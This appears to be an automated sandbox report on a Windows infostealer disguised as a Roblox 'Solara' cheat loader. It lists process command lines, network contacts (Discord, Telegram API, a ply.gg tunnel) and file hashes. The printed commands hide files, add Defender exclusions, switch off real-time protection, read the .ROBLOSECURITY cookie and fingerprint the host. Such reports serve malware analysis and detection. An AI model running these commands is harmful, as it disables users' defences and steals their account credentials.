C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 23.62.61.139:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 139.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.139:443 www.bing.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 73.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 tcp

Files

memory/4792-0-0x00007FF863053000-0x00007FF863055000-memory.dmp

memory/4792-1-0x0000000000B30000-0x0000000000D16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

memory/4792-18-0x00007FF863050000-0x00007FF863B11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/4796-21-0x00000000004E0000-0x000000000050A000-memory.dmp

memory/4796-23-0x00007FF863050000-0x00007FF863B11000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

memory/1336-62-0x0000000000730000-0x0000000000746000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/2704-67-0x00000212BA830000-0x00000212BA870000-memory.dmp

memory/4796-68-0x00007FF863050000-0x00007FF863B11000-memory.dmp

memory/3136-74-0x000002393FBC0000-0x000002393FBE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukdf3zdd.d5a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

MD5 bb6a89a9355baba2918bb7c32eca1c94
SHA1 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512 efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

memory/2704-105-0x00000212D4FC0000-0x00000212D5036000-memory.dmp

memory/2704-107-0x00000212D4F40000-0x00000212D4F90000-memory.dmp

memory/2704-108-0x00000212BC4B0000-0x00000212BC4CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
